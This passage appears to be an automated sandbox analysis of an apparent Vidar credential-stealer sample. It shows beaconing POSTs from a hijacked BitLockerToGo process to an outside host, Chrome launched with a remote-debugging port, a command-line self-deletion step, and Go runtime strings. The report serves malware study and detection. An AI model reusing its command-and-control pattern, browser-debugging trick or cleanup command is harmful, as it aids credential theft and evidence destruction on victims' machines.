                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:02:03 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 67 6c 66 33 37 39 7a 35 70 7a 63 74 6a 65 6b 36 38 67 76 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 33 37 39 7a 35 70 7a 63 74 6a 65 6b 36 38 67 76 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 66 33 37 39 7a 35 70 7a 63 74 6a 65 6b 36 38 67 76 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------glf379z5pzctjek68gv3Content-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------glf379z5pzctjek68gv3Content-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------glf379z5pzctjek68gv3Cont
                                                                                                                                                                                                                                    2025-01-09 13:02:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:04 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    27192.168.2.44985094.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:02:07 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2djmo8g4ect2nymophdt
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:02:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 64 6a 6d 6f 38 67 34 65 63 74 32 6e 79 6d 6f 70 68 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 32 64 6a 6d 6f 38 67 34 65 63 74 32 6e 79 6d 6f 70 68 64 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 32 64 6a 6d 6f 38 67 34 65 63 74 32 6e 79 6d 6f 70 68 64 74 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------2djmo8g4ect2nymophdtContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------2djmo8g4ect2nymophdtContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------2djmo8g4ect2nymophdtCont
                                                                                                                                                                                                                                    2025-01-09 13:02:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:08 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    28192.168.2.44985694.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:02:09 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----hlxtr90h47gv37q1nopp
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:02:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 68 6c 78 74 72 39 30 68 34 37 67 76 33 37 71 31 6e 6f 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 78 74 72 39 30 68 34 37 67 76 33 37 71 31 6e 6f 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 68 6c 78 74 72 39 30 68 34 37 67 76 33 37 71 31 6e 6f 70 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------hlxtr90h47gv37q1noppContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------hlxtr90h47gv37q1noppContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------hlxtr90h47gv37q1noppCont
                                                                                                                                                                                                                                    2025-01-09 13:02:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:02:09 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:02:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:08:01:02
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\DyM4yXX.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\DyM4yXX.exe"
                                                                                                                                                                                                                                    Imagebase:0x80000
                                                                                                                                                                                                                                    File size:5'594'624 bytes
                                                                                                                                                                                                                                    MD5 hash:67B35433E066311E95419AF40384DD92
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1980406859.0000000009D92000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:08:01:24
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                    Imagebase:0x9b0000
                                                                                                                                                                                                                                    File size:231'736 bytes
                                                                                                                                                                                                                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2391688349.0000000000764000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000003.2047747108.0000000000771000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:08:01:37
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:08:01:38
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2556 --field-trial-handle=2460,i,7943810038441131644,12745396479495106010,262144 /prefetch:8
                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:08:02:08
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\riwlf" & exit
                                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:08:02:08
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:08:02:08
                                                                                                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                                    Imagebase:0xb60000
                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 000B3500 Relevance: 11.4, Strings: 9, Instructions: 172COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=too many columns returned for primitive slicetransform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another, xrefs: 000B378C
                                                                                                                                                                                                                                      • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected InstFailunexpected file endunexpected g statusunknown Go type: %vunknown certificateunknown hash , xrefs: 000B369B
                                                                                                                                                                                                                                      • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate header in security directorynot enough significa, xrefs: 000B37C0
                                                                                                                                                                                                                                      • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryfield not exist in the source dataforEachP: sched.safePo, xrefs: 000B3765
                                                                                                                                                                                                                                      • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]too many Additionals to pack (>65535)t, xrefs: 000B381B
                                                                                                                                                                                                                                      • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=too many columns returned for primitive slicetransform: input and output are not identicaltransitioning GC to the same state , xrefs: 000B37E7
                                                                                                                                                                                                                                      • %, xrefs: 000B3824
                                                                                                                                                                                                                                      • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 000B3731
                                                                                                                                                                                                                                      • bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdarkseagreendumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowgreater_thanharddecommithi_magenta_bhost is , xrefs: 000B370A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1982217979.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982199186.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000002F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000003CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982699236.0000000000581000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982732151.000000000058A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982778787.00000000005B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982809963.00000000005B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1983229275.00000000005E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1983260684.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_80000_DyM4yXX.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: %$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol table: %d aux symbols unreadinvalid certificate header in security directorynot enough significa$VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerdriver: remove argument from queryfield not exist in the source dataforEachP: sched.safePo$bad g0 stackbad recoverycaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOdarkseagreendumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowgreater_thanharddecommithi_magenta_bhost is $runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=too many columns returned for primitive slicetransform: input and output are not identicaltransitioning GC to the same state $runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]too many Additionals to pack (>65535)t$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=too many columns returned for primitive slicetransform: input and output are not identicaltransitioning GC to the same state as before?tried to run scavenger from another$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open filesunexpected InstFailunexpected file endunexpected g statusunknown Go type: %vunknown certificateunknown hash
                                                                                                                                                                                                                                      • API String ID: 0-3321689900
                                                                                                                                                                                                                                      • Opcode ID: 09419b5156724d2c86a30ec67ba4905a73191c054deb92a2384cca3ea3871280
                                                                                                                                                                                                                                      • Instruction ID: 3769ffeca1b9289c50f33d9131b0697ec3dd17d286eafc7c8eefa0eea7eb26b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09419b5156724d2c86a30ec67ba4905a73191c054deb92a2384cca3ea3871280
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 528112B45087059FD340EF64C199B9ABBE8BF88704F00892DF88887362DB78D949CF52
                                                                                                                                                                                                                                      Function 000C3550 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • m->p= max= min= next= p->m= prev= span=${1}en${1}es${1}ex${1}fe${1}is${1}ix${1}um${1}us% util(...)(bu)s$(o)es$, i = , not , val .local.onion.reloc00000000000100005f0000800000870000af0000d70000fe0000ff005f00005f5f005f87005faf005fd7005fff00800000808000870000, xrefs: 000C360B
                                                                                                                                                                                                                                      • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 000C36A1
                                                                                                                                                                                                                                      • releasep: m=requiredWithruntime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestr_containsstringLengthstringNumberstrings2intssweepWaiterstraceStringstransmitfiletrim_stringsunexpected )unknown portupload_imagewintrust.dllwirep: p->m=worker m, xrefs: 000C35E9
                                                                                                                                                                                                                                      • p->status= s.nelems= schedtick= span.list= timerslen=${1}${2}ves%!(BADPREC)(bus)(es)?$(matr)ices$) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html100,149,237102,205,170105,105,105112,128,144119,136,153123,104,238127,255, xrefs: 000C3657
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1982217979.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982199186.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000002F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982402008.00000000003CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982699236.0000000000581000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982732151.000000000058A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982778787.00000000005B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982809963.00000000005B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1982849722.00000000005E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1983229275.00000000005E6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1983260684.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_80000_DyM4yXX.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: m->p= max= min= next= p->m= prev= span=${1}en${1}es${1}ex${1}fe${1}is${1}ix${1}um${1}us% util(...)(bu)s$(o)es$, i = , not , val .local.onion.reloc00000000000100005f0000800000870000af0000d70000fe0000ff005f00005f5f005f87005faf005fd7005fff00800000808000870000$ p->status= s.nelems= schedtick= span.list= timerslen=${1}${2}ves%!(BADPREC)(bus)(es)?$(matr)ices$) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html100,149,237102,205,170105,105,105112,128,144119,136,153123,104,238127,255$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=requiredWithruntime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinestr_containsstringLengthstringNumberstrings2intssweepWaiterstraceStringstransmitfiletrim_stringsunexpected )unknown portupload_imagewintrust.dllwirep: p->m=worker m
                                                                                                                                                                                                                                      • API String ID: 0-2704640195
                                                                                                                                                                                                                                      • Opcode ID: 67d63e5f489e8b3359195cf9e53545128542cf856d1e6bbd69c108891fdb683a
                                                                                                                                                                                                                                      • Instruction ID: 6828605d1ccc66e30c67b8db4f57ca49bc88785cfba2c680323cd82977df420d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d63e5f489e8b3359195cf9e53545128542cf856d1e6bbd69c108891fdb683a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6231F4B45087059FC700EF24C194B9ABBE8BF84704F05C96DE48887322DB79D948DF62

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:13.3%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:4.9%
                                                                                                                                                                                                                                      Total number of Nodes:182
                                                                                                                                                                                                                                      Total number of Limit Nodes:1
